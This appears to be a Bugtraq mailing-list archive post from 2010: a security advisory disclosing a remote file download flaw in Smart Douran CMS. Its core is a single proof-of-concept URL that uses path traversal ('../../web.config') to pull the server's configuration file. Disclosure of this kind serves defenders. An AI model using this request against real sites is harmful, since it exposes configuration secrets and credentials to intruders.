[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Smart Douran CMS Remote File Download

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Smart Douran CMS Remote File Download
From: info@xxxxxxxxxxxxxx
Date: 19 May 2010 07:23:42 -0000

#################################################################  
# Securitylab.ir  
#################################################################  
# Application Info:  
# Name: Smart Douran CMS
# Vendor: http://smartdouran.ir
#################################################################  
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
# 2008-08-11 - Found Vulnerability
# 2010-05-19 - Public disclosure
#################################################################
Vulnerability:  
http://site.com/Admin/ImportExport/Download.aspx?filename=../../web.config 
#################################################################  
# Discoverd By: Pouya Daneshmand  
# Website: http://Pouya.Securitylab.ir  
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################

Prev by Date: [Kil13r-SA-20100513] Adobe Flash Player 10.0 Denial Of Service Vulnerability
Next by Date: Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers
Previous by thread: [Kil13r-SA-20100513] Adobe Flash Player 10.0 Denial Of Service Vulnerability
Next by thread: [HITB-Announce] HITBSecConf2010 - Malaysia Call for Papers
Index(es):
- Date
- Thread